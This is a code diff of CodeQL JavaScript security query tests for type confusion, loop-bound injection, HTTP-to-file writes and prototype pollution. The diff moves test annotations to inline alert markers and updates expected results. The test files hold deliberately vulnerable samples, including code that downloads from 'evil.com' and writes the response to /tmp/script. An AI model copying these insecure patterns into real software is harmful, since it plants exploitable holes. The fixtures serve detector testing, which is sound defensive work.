@@ function nullPointer2(val) { function nullPointer3(val) { let arr = val.messaging - for (let i = 0; i < arr.length; i++) { // OK + for (let i = 0; i < arr.length; i++) { let event = val.messaging[i] let sender = event.sender.id } @@ -46,13 +46,13 @@ function nullPointer3(val) { function lodashPointer(val) { - return _.map(val, function(e) { // OK + return _.map(val, function(e) { return e.foo; }) } function lodashArrowFunc(val) { - return _.map(val, (e) => { // OK + return _.map(val, (e) => { return e.foo; }); } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js index bbbe3a9eb7ee..ac456fbdbd94 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js @@ -14,11 +14,11 @@ function nullPointer(val) { var ret = []; // Has obvious null-pointer. And guards the next loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i].foo); } - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i]); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-843/TypeConfusionThroughParameterTampering.expected b/javascript/ql/test/query-tests/Security/CWE-843/TypeConfusionThroughParameterTampering.expected index 27de08dc8461..b07e1c194a45 100644 --- a/javascript/ql/test/query-tests/Security/CWE-843/TypeConfusionThroughParameterTampering.expected +++ b/javascript/ql/test/query-tests/Security/CWE-843/TypeConfusionThroughParameterTampering.expected @@ -1,3 +1,18 @@ +#select +| tst.js:6:5:6:7 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:6:5:6:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | +| tst.js:8:5:8:7 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:8:5:8:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | +| tst.js:11:9:11:11 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:11:9:11:11 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | +| tst.js:15:9:15:11 | bar | tst.js:5:15:5:27 | req.query.foo | tst.js:15:9:15:11 | bar | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | +| tst.js:27:5:27:7 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:27:5:27:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | +| tst.js:28:5:28:7 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:28:5:28:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | +| tst.js:30:5:30:7 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:30:5:30:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | +| tst.js:48:5:48:7 | foo | tst.js:47:15:47:35 | ctx.req ... ery.foo | tst.js:48:5:48:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:47:15:47:35 | ctx.req ... ery.foo | this HTTP request parameter | +| tst.js:83:9:83:9 | p | tst.js:79:25:79:38 | req.query.path | tst.js:83:9:83:9 | p | Potential type confusion as $@ may be either an array or a string. | tst.js:79:25:79:38 | req.query.path | this HTTP request parameter | +| tst.js:84:9:84:9 | p | tst.js:79:25:79:38 | req.query.path | tst.js:84:9:84:9 | p | Potential type confusion as $@ may be either an array or a string. | tst.js:79:25:79:38 | req.query.path | this HTTP request parameter | +| tst.js:92:5:92:12 | data.foo | tst.js:92:5:92:12 | data.foo | tst.js:92:5:92:12 | data.foo | Potential type confusion as $@ may be either an array or a string. | tst.js:92:5:92:12 | data.foo | this HTTP request parameter | +| tst.js:94:9:94:16 | data.foo | tst.js:94:9:94:16 | data.foo | tst.js:94:9:94:16 | data.foo | Potential type confusion as $@ may be either an array or a string. | tst.js:94:9:94:16 | data.foo | this HTTP request parameter | +| tst.js:100:9:100:16 | data.foo | tst.js:100:9:100:16 | data.foo | tst.js:100:9:100:16 | data.foo | Potential type confusion as $@ may be either an array or a string. | tst.js:100:9:100:16 | data.foo | this HTTP request parameter | +| tst.js:106:5:106:8 | data | tst.js:105:16:105:29 | req.query.data | tst.js:106:5:106:8 | data | Potential type confusion as $@ may be either an array or a string. | tst.js:105:16:105:29 | req.query.data | this HTTP request parameter | edges | tst.js:5:9:5:27 | foo | tst.js:6:5:6:7 | foo | provenance | | | tst.js:5:9:5:27 | foo | tst.js:6:5:6:7 | foo | provenance | | @@ -11,14 +26,16 @@ edges | tst.js:5:9:5:27 | foo | tst.js:27:5:27:7 | foo | provenance | | | tst.js:5:9:5:27 | foo | tst.js:27:5:27:7 | foo | provenance | | | tst.js:5:9:5:27 | foo | tst.js:28:5:28:7 | foo | provenance | | +| tst.js:5:9:5:27 | foo | tst.js:28:5:28:7 | foo | provenance | | +| tst.js:5:9:5:27 | foo | tst.js:30:5:30:7 | foo | provenance | | | tst.js:5:15:5:27 | req.query.foo | tst.js:5:9:5:27 | foo | provenance | | | tst.js:6:5:6:7 | foo | tst.js:8:5:8:7 | foo | provenance | | | tst.js:6:5:6:7 | foo | tst.js:8:5:8:7 | foo | provenance | | -| tst.js:8:5:8:7 | foo | tst.js:10:5:12:5 | functio ... K\\n } [foo] | provenance | | +| tst.js:8:5:8:7 | foo | tst.js:10:5:12:5 | functio ... t\\n } [foo] | provenance | | | tst.js:8:5:8:7 | foo | tst.js:17:7:17:9 | foo | provenance | | -| tst.js:10:5:12:5 | functio ... K\\n } [foo] | tst.js:10:14:10:14 | f [foo] | provenance | | -| tst.js:10:5:12:5 | functio ... K\\n } [foo] | tst.js:11:9:11:11 | foo | provenance | | -| tst.js:10:14:10:14 | f [foo] | tst.js:39:12:39:12 | f [foo] | provenance | | +| tst.js:10:5:12:5 | functio ... t\\n } [foo] | tst.js:10:14:10:14 | f [foo] | provenance | | +| tst.js:10:5:12:5 | functio ... t\\n } [foo] | tst.js:11:9:11:11 | foo | provenance | | +| tst.js:10:14:10:14 | f [foo] | tst.js:41:12:41:12 | f [foo] | provenance | | | tst.js:14:16:14:18 | bar | tst.js:15:9:15:11 | bar | provenance | | | tst.js:17:7:17:9 | foo | tst.js:14:16:14:18 | bar | provenance | | | tst.js:17:7:17:9 | foo | tst.js:21:5:21:7 | foo | provenance | | @@ -28,14 +45,16 @@ edges | tst.js:25:5:25:7 | foo | tst.js:27:5:27:7 | foo | provenance | | | tst.js:25:5:25:7 | foo | tst.js:27:5:27:7 | foo | provenance | | | tst.js:27:5:27:7 | foo | tst.js:28:5:28:7 | foo | provenance | | -| tst.js:39:12:39:12 | f [foo] | tst.js:11:9:11:11 | foo | provenance | | -| tst.js:45:9:45:35 | foo | tst.js:46:5:46:7 | foo | provenance | | -| tst.js:45:15:45:35 | ctx.req ... ery.foo | tst.js:45:9:45:35 | foo | provenance | | -| tst.js:77:25:77:38 | req.query.path | tst.js:80:23:80:23 | p | provenance | | -| tst.js:80:23:80:23 | p | tst.js:81:9:81:9 | p | provenance | | -| tst.js:80:23:80:23 | p | tst.js:82:9:82:9 | p | provenance | | -| tst.js:103:9:103:29 | data | tst.js:104:5:104:8 | data | provenance | | -| tst.js:103:16:103:29 | req.query.data | tst.js:103:9:103:29 | data | provenance | | +| tst.js:27:5:27:7 | foo | tst.js:28:5:28:7 | foo | provenance | | +| tst.js:28:5:28:7 | foo | tst.js:30:5:30:7 | foo | provenance | | +| tst.js:41:12:41:12 | f [foo] | tst.js:11:9:11:11 | foo | provenance | | +| tst.js:47:9:47:35 | foo | tst.js:48:5:48:7 | foo | provenance | | +| tst.js:47:15:47:35 | ctx.req ... ery.foo | tst.js:47:9:47:35 | foo | provenance | | +| tst.js:79:25:79:38 | req.query.path | tst.js:82:23:82:23 | p | provenance | | +| tst.js:82:23:82:23 | p | tst.js:83:9:83:9 | p | provenance | | +| tst.js:82:23:82:23 | p | tst.js:84:9:84:9 | p | provenance | | +| tst.js:105:9:105:29 | data | tst.js:106:5:106:8 | data | provenance | | +| tst.js:105:16:105:29 | req.query.data | tst.js:105:9:105:29 | data | provenance | | nodes | tst.js:5:9:5:27 | foo | semmle.label | foo | | tst.js:5:15:5:27 | req.query.foo | semmle.label | req.query.foo | @@ -43,7 +62,7 @@ nodes | tst.js:6:5:6:7 | foo | semmle.label | foo | | tst.js:8:5:8:7 | foo | semmle.label | foo | | tst.js:8:5:8:7 | foo | semmle.label | foo | -| tst.js:10:5:12:5 | functio ... K\\n } [foo] | semmle.label | functio ... K\\n } [foo] | +| tst.js:10:5:12:5 | functio ... t\\n } [foo] | semmle.label | functio ... t\\n } [foo] | | tst.js:10:14:10:14 | f [foo] | semmle.label | f [foo] | | tst.js:11:9:11:11 | foo | semmle.label | foo | | tst.js:14:16:14:18 | bar | semmle.label | bar | @@ -56,32 +75,20 @@ nodes | tst.js:27:5:27:7 | foo | semmle.label | foo | | tst.js:27:5:27:7 | foo | semmle.label | foo | | tst.js:28:5:28:7 | foo | semmle.label | foo | -| tst.js:39:12:39:12 | f [foo] | semmle.label | f [foo] | -| tst.js:45:9:45:35 | foo | semmle.label | foo | -| tst.js:45:15:45:35 | ctx.req ... ery.foo | semmle.label | ctx.req ... ery.foo | -| tst.js:46:5:46:7 | foo | semmle.label | foo | -| tst.js:77:25:77:38 | req.query.path | semmle.label | req.query.path | -| tst.js:80:23:80:23 | p | semmle.label | p | -| tst.js:81:9:81:9 | p | semmle.label | p | -| tst.js:82:9:82:9 | p | semmle.label | p | -| tst.js:90:5:90:12 | data.foo | semmle.label | data.foo | -| tst.js:92:9:92:16 | data.foo | semmle.label | data.foo | -| tst.js:98:9:98:16 | data.foo | semmle.label | data.foo | -| tst.js:103:9:103:29 | data | semmle.label | data | -| tst.js:103:16:103:29 | req.query.data | semmle.label | req.query.data | -| tst.js:104:5:104:8 | data | semmle.label | data | +| tst.js:28:5:28:7 | foo | semmle.label | foo | +| tst.js:30:5:30:7 | foo | semmle.label | foo | +| tst.js:41:12:41:12 | f [foo] | semmle.label | f [foo] | +| tst.js:47:9:47:35 | foo | semmle.label | foo | +| tst.js:47:15:47:35 | ctx.req ... ery.foo | semmle.label | ctx.req ... ery.foo | +| tst.js:48:5:48:7 | foo | semmle.label | foo | +| tst.js:79:25:79:38 | req.query.path | semmle.label | req.query.path | +| tst.js:82:23:82:23 | p | semmle.label | p | +| tst.js:83:9:83:9 | p | semmle.label | p | +| tst.js:84:9:84:9 | p | semmle.label | p | +| tst.js:92:5:92:12 | data.foo | semmle.label | data.foo | +| tst.js:94:9:94:16 | data.foo | semmle.label | data.foo | +| tst.js:100:9:100:16 | data.foo | semmle.label | data.foo | +| tst.js:105:9:105:29 | data | semmle.label | data | +| tst.js:105:16:105:29 | req.query.data | semmle.label | req.query.data | +| tst.js:106:5:106:8 | data | semmle.label | data | subpaths -#select -| tst.js:6:5:6:7 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:6:5:6:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | -| tst.js:8:5:8:7 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:8:5:8:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | -| tst.js:11:9:11:11 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:11:9:11:11 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | -| tst.js:15:9:15:11 | bar | tst.js:5:15:5:27 | req.query.foo | tst.js:15:9:15:11 | bar | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | -| tst.js:27:5:27:7 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:27:5:27:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | -| tst.js:28:5:28:7 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:28:5:28:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | -| tst.js:46:5:46:7 | foo | tst.js:45:15:45:35 | ctx.req ... ery.foo | tst.js:46:5:46:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:45:15:45:35 | ctx.req ... ery.foo | this HTTP request parameter | -| tst.js:81:9:81:9 | p | tst.js:77:25:77:38 | req.query.path | tst.js:81:9:81:9 | p | Potential type confusion as $@ may be either an array or a string. | tst.js:77:25:77:38 | req.query.path | this HTTP request parameter | -| tst.js:82:9:82:9 | p | tst.js:77:25:77:38 | req.query.path | tst.js:82:9:82:9 | p | Potential type confusion as $@ may be either an array or a string. | tst.js:77:25:77:38 | req.query.path | this HTTP request parameter | -| tst.js:90:5:90:12 | data.foo | tst.js:90:5:90:12 | data.foo | tst.js:90:5:90:12 | data.foo | Potential type confusion as $@ may be either an array or a string. | tst.js:90:5:90:12 | data.foo | this HTTP request parameter | -| tst.js:92:9:92:16 | data.foo | tst.js:92:9:92:16 | data.foo | tst.js:92:9:92:16 | data.foo | Potential type confusion as $@ may be either an array or a string. | tst.js:92:9:92:16 | data.foo | this HTTP request parameter | -| tst.js:98:9:98:16 | data.foo | tst.js:98:9:98:16 | data.foo | tst.js:98:9:98:16 | data.foo | Potential type confusion as $@ may be either an array or a string. | tst.js:98:9:98:16 | data.foo | this HTTP request parameter | -| tst.js:104:5:104:8 | data | tst.js:103:16:103:29 | req.query.data | tst.js:104:5:104:8 | data | Potential type confusion as $@ may be either an array or a string. | tst.js:103:16:103:29 | req.query.data | this HTTP request parameter | diff --git a/javascript/ql/test/query-tests/Security/CWE-843/TypeConfusionThroughParameterTampering.qlref b/javascript/ql/test/query-tests/Security/CWE-843/TypeConfusionThroughParameterTampering.qlref index a7fa58d3b2bc..ede9b8f867cb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-843/TypeConfusionThroughParameterTampering.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-843/TypeConfusionThroughParameterTampering.qlref @@ -1 +1,2 @@ -Security/CWE-843/TypeConfusionThroughParameterTampering.ql +query: Security/CWE-843/TypeConfusionThroughParameterTampering.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-843/tst.js b/javascript/ql/test/query-tests/Security/CWE-843/tst.js index 3f5840b9f080..40e18cf22e9f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-843/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-843/tst.js @@ -2,60 +2,62 @@ var express = require('express'); var Koa = require('koa'); express().get('/some/path', function (req, res) { - var foo = req.query.foo; - foo.indexOf(); // NOT OK + var foo = req.query.foo; // $ Source + foo.indexOf(); // $ Alert - foo.concat(); // NOT OK + foo.concat(); // $ Alert function f() { - foo.concat(); // NOT OK + foo.concat(); // $ Alert } function g(bar) { - bar.concat(); // NOT OK + bar.concat(); // $ Alert } g(foo); - req.url.indexOf(); // OK + req.url.indexOf(); - foo.indexOf(prefix) === 0; // OK - foo.indexOf(prefix) == 0; // OK - foo.indexOf(prefix) !== 0; // OK + foo.indexOf(prefix) === 0; + foo.indexOf(prefix) == 0; + foo.indexOf(prefix) !== 0; - foo.slice(-1) === 'x'; // OK + foo.slice(-1) === 'x'; - foo.indexOf(prefix) == 1; // NOT OK - foo.slice(1) === 'x'; // NOT OK + foo.indexOf(prefix) == 1; // $ Alert + foo.slice(1) === 'x'; // $ Alert + + foo.length; // $ Alert if (typeof foo === "string") { - foo.indexOf(); // OK + foo.indexOf(); } else { - foo.indexOf(); // OK + foo.indexOf(); } if (foo instanceof Array) { - foo.indexOf(); // OK, but still flagged [INCONSISTENCY] + foo.indexOf(); } - (foo + f()).indexOf(); // OK + (foo + f()).indexOf(); - foo.length; // NOT OK + foo.length; // $ MISSING: Alert - missed due to guards sanitising both branches }); new Koa().use(function handler(ctx) { - var foo = ctx.request.query.foo; - foo.indexOf(); // NOT OK + var foo = ctx.request.query.foo; // $ Source + foo.indexOf(); // $ Alert }); express().get('/some/path/:foo', function (req, res) { var foo = req.params.foo; - foo.indexOf(); // OK + foo.indexOf(); }); express().get('/some/path/:foo', function (req, res) { - if (req.query.path.length) { } // OK - req.query.path.length == 0; // OK - !req.query.path.length; // OK - req.query.path.length > 0; // OK + if (req.query.path.length) { } + req.query.path.length == 0; + !req.query.path.length; + req.query.path.length > 0; }); express().get('/some/path/:foo', function (req, res) { @@ -65,21 +67,21 @@ express().get('/some/path/:foo', function (req, res) { return; } - while (p.length) { // OK + while (p.length) { p = p.substr(1); } - p.length < 1; // OK + p.length < 1; }); express().get('/some/path/:foo', function (req, res) { let someObject = {}; - safeGet(someObject, req.query.path).bar = 'baz'; // prototype pollution here - but flagged in `safeGet` + safeGet(someObject, req.query.path).bar = 'baz'; // $ Source - prototype pollution here - but flagged in `safeGet` }); function safeGet(obj, p) { - if (p === '__proto__' || // NOT OK - could be singleton array - p === 'constructor') { // NOT OK - could be singleton array + if (p === '__proto__' || // $ Alert - could be singleton array + p === 'constructor') { // $ Alert - could be singleton array return null; } return obj[p]; @@ -87,24 +89,24 @@ function safeGet(obj, p) { express().get('/foo', function (req, res) { let data = req.query; - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert if (typeof data.foo !== 'undefined') { - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert } if (typeof data.foo !== 'string') { - data.foo.indexOf(); // OK + data.foo.indexOf(); } if (typeof data.foo !== 'undefined') { - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert } }); express().get('/foo', function (req, res) { - let data = req.query.data; - data.indexOf(); // NOT OK + let data = req.query.data; // $ Source + data.indexOf(); // $ Alert if (Array.isArray(data)) { - data.indexOf(); // OK + data.indexOf(); } else { - data.indexOf(); // OK + data.indexOf(); } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-862/EmptyPasswordInConfigurationFile.qlref b/javascript/ql/test/query-tests/Security/CWE-862/EmptyPasswordInConfigurationFile.qlref index 894dcbc7cbb2..3350d038cd52 100644 --- a/javascript/ql/test/query-tests/Security/CWE-862/EmptyPasswordInConfigurationFile.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-862/EmptyPasswordInConfigurationFile.qlref @@ -1 +1 @@ -Security/CWE-862/EmptyPasswordInConfigurationFile.ql +query: Security/CWE-862/EmptyPasswordInConfigurationFile.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.expected b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.expected index 0928df48ef9a..1fc29a85b645 100644 --- a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.expected +++ b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.expected @@ -1,3 +1,8 @@ +#select +| HttpToFileAccess.js:6:37:6:37 | d | HttpToFileAccess.js:5:18:5:18 | d | HttpToFileAccess.js:6:37:6:37 | d | Write to file system depends on $@. | HttpToFileAccess.js:5:18:5:18 | d | Untrusted data | +| tst.js:16:33:16:33 | c | tst.js:15:26:15:26 | c | tst.js:16:33:16:33 | c | Write to file system depends on $@. | tst.js:15:26:15:26 | c | Untrusted data | +| tst.js:19:25:19:25 | c | tst.js:15:26:15:26 | c | tst.js:19:25:19:25 | c | Write to file system depends on $@. | tst.js:15:26:15:26 | c | Untrusted data | +| tst.js:24:22:24:22 | c | tst.js:15:26:15:26 | c | tst.js:24:22:24:22 | c | Write to file system depends on $@. | tst.js:15:26:15:26 | c | Untrusted data | edges | HttpToFileAccess.js:5:18:5:18 | d | HttpToFileAccess.js:6:37:6:37 | d | provenance | | | tst.js:15:26:15:26 | c | tst.js:16:33:16:33 | c | provenance | | @@ -17,8 +22,3 @@ nodes | tst.js:19:25:19:25 | c | semmle.label | c | | tst.js:24:22:24:22 | c | semmle.label | c | subpaths -#select -| HttpToFileAccess.js:6:37:6:37 | d | HttpToFileAccess.js:5:18:5:18 | d | HttpToFileAccess.js:6:37:6:37 | d | Write to file system depends on $@. | HttpToFileAccess.js:5:18:5:18 | d | Untrusted data | -| tst.js:16:33:16:33 | c | tst.js:15:26:15:26 | c | tst.js:16:33:16:33 | c | Write to file system depends on $@. | tst.js:15:26:15:26 | c | Untrusted data | -| tst.js:19:25:19:25 | c | tst.js:15:26:15:26 | c | tst.js:19:25:19:25 | c | Write to file system depends on $@. | tst.js:15:26:15:26 | c | Untrusted data | -| tst.js:24:22:24:22 | c | tst.js:15:26:15:26 | c | tst.js:24:22:24:22 | c | Write to file system depends on $@. | tst.js:15:26:15:26 | c | Untrusted data | diff --git a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js index 77645d0f3ac4..3c56f9bdf2f0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js +++ b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js @@ -2,7 +2,7 @@ var https = require("https"); var fs = require("fs"); https.get('https://evil.com/script', res => { - res.on("data", d => { - fs.writeFileSync("/tmp/script", d) + res.on("data", d => { // $ Source + fs.writeFileSync("/tmp/script", d) // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.qlref b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.qlref index 674372632908..d40718a26d8e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.qlref @@ -1 +1,2 @@ -Security/CWE-912/HttpToFileAccess.ql +query: Security/CWE-912/HttpToFileAccess.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-912/tst.js b/javascript/ql/test/query-tests/Security/CWE-912/tst.js index 78acef7d3aad..00e89fd11e6f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-912/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-912/tst.js @@ -12,28 +12,28 @@ try { }, (response) => { response.setEncoding('utf8'); - response.on('data', (c) => { - fs.writeFile("/tmp/test", c, (err) => {}); // BAD: data from response 'on' event flows to file + response.on('data', (c) => { // $ Source + fs.writeFile("/tmp/test", c, (err) => {}); // $ Alert - data from response 'on' event flows to file let writeStream = fs.createWriteStream('/usr/evil/evil.cmd'); - writeStream.write(c); // BAD: data from response 'on' event flows to filestream write + writeStream.write(c); // $ Alert - data from response 'on' event flows to filestream write writeStream.end(); var stream = fs.createWriteStream("my_file.txt"); stream.once('open', function (fd) { - stream.write(c); // BAD: data from response 'on' event flows to filestream write + stream.write(c); // $ Alert - data from response 'on' event flows to filestream write stream.end(); }); }); response.on('error', () => { - fs.writeFile("/tmp/test", "error occured"); // GOOD: static data written to file + fs.writeFile("/tmp/test", "error occured"); // OK - static data written to file }); }).on('error', () => { let error = "error occured"; let writeStream = fs.createWriteStream('/usr/good/errorlog.txt'); - writeStream.write(error); // GOOD: static data written to file stream + writeStream.write(error); // OK - static data written to file stream writeStream.end(); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected deleted file mode 100644 index 8efa3a055b19..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected +++ /dev/null @@ -1 +0,0 @@ -| lib.js:70 | expected an alert, but found none | NOT OK | Config | diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql deleted file mode 100644 index d80f9d23ff52..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql +++ /dev/null @@ -1,16 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.PrototypePollutingAssignmentQuery - -deprecated class Config extends ConsistencyConfiguration { - Config() { this = "Config" } - - override File getAFile() { any() } - - override DataFlow::Node getAnAlert() { - exists(DataFlow::Node source | - PrototypePollutingAssignmentFlow::flow(source, result) and - not isIgnoredLibraryFlow(source, result) - ) - } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/PrototypePollutingAssignment.expected b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/PrototypePollutingAssignment.expected index 34df462cf0ae..67aadb32c311 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/PrototypePollutingAssignment.expected +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/PrototypePollutingAssignment.expected @@ -1,3 +1,31 @@ +#select +| lib.js:6:7:6:9 | obj | lib.js:1:43:1:46 | path | lib.js:6:7:6:9 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:1:43:1:46 | path | library input | +| lib.js:15:3:15:14 | obj[path[0]] | lib.js:14:38:14:41 | path | lib.js:15:3:15:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:14:38:14:41 | path | library input | +| lib.js:22:3:22:14 | obj[path[0]] | lib.js:20:14:20:22 | arguments | lib.js:22:3:22:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:20:14:20:22 | arguments | library input | +| lib.js:26:10:26:21 | obj[path[0]] | lib.js:25:44:25:47 | path | lib.js:26:10:26:21 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:25:44:25:47 | path | library input | +| lib.js:34:3:34:14 | obj[path[0]] | lib.js:30:43:30:51 | arguments | lib.js:34:3:34:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:30:43:30:51 | arguments | library input | +| lib.js:42:3:42:14 | obj[path[0]] | lib.js:38:27:38:35 | arguments | lib.js:42:3:42:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:38:27:38:35 | arguments | library input | +| lib.js:87:10:87:14 | proto | lib.js:83:14:83:22 | arguments | lib.js:87:10:87:14 | proto | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:83:14:83:22 | arguments | library input | +| lib.js:108:3:108:10 | obj[one] | lib.js:104:13:104:21 | arguments | lib.js:108:3:108:10 | obj[one] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:104:13:104:21 | arguments | library input | +| lib.js:119:13:119:24 | obj[path[0]] | lib.js:118:29:118:32 | path | lib.js:119:13:119:24 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:118:29:118:32 | path | library input | +| lib.js:128:9:128:20 | obj[path[0]] | lib.js:127:14:127:17 | path | lib.js:128:9:128:20 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:127:14:127:17 | path | library input | +| otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] | otherlib/src/otherlibimpl.js:1:37:1:40 | path | otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | otherlib/src/otherlibimpl.js:1:37:1:40 | path | library input | +| sublib/other.js:6:7:6:18 | obj[path[0]] | sublib/other.js:5:28:5:31 | path | sublib/other.js:6:7:6:18 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | sublib/other.js:5:28:5:31 | path | library input | +| sublib/sub.js:2:3:2:14 | obj[path[0]] | sublib/sub.js:1:37:1:40 | path | sublib/sub.js:2:3:2:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | sublib/sub.js:1:37:1:40 | path | library input | +| tst.js:8:5:8:17 | object[taint] | tst.js:5:24:5:37 | req.query.data | tst.js:8:5:8:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | +| tst.js:9:5:9:17 | object[taint] | tst.js:5:24:5:37 | req.query.data | tst.js:9:5:9:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | +| tst.js:14:5:14:32 | unsafeG ... taint) | tst.js:5:24:5:37 | req.query.data | tst.js:14:5:14:32 | unsafeG ... taint) | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | +| tst.js:34:5:34:7 | obj | tst.js:5:24:5:37 | req.query.data | tst.js:34:5:34:7 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | +| tst.js:39:9:39:11 | obj | tst.js:5:24:5:37 | req.query.data | tst.js:39:9:39:11 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | +| tst.js:45:9:45:11 | obj | tst.js:5:24:5:37 | req.query.data | tst.js:45:9:45:11 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from 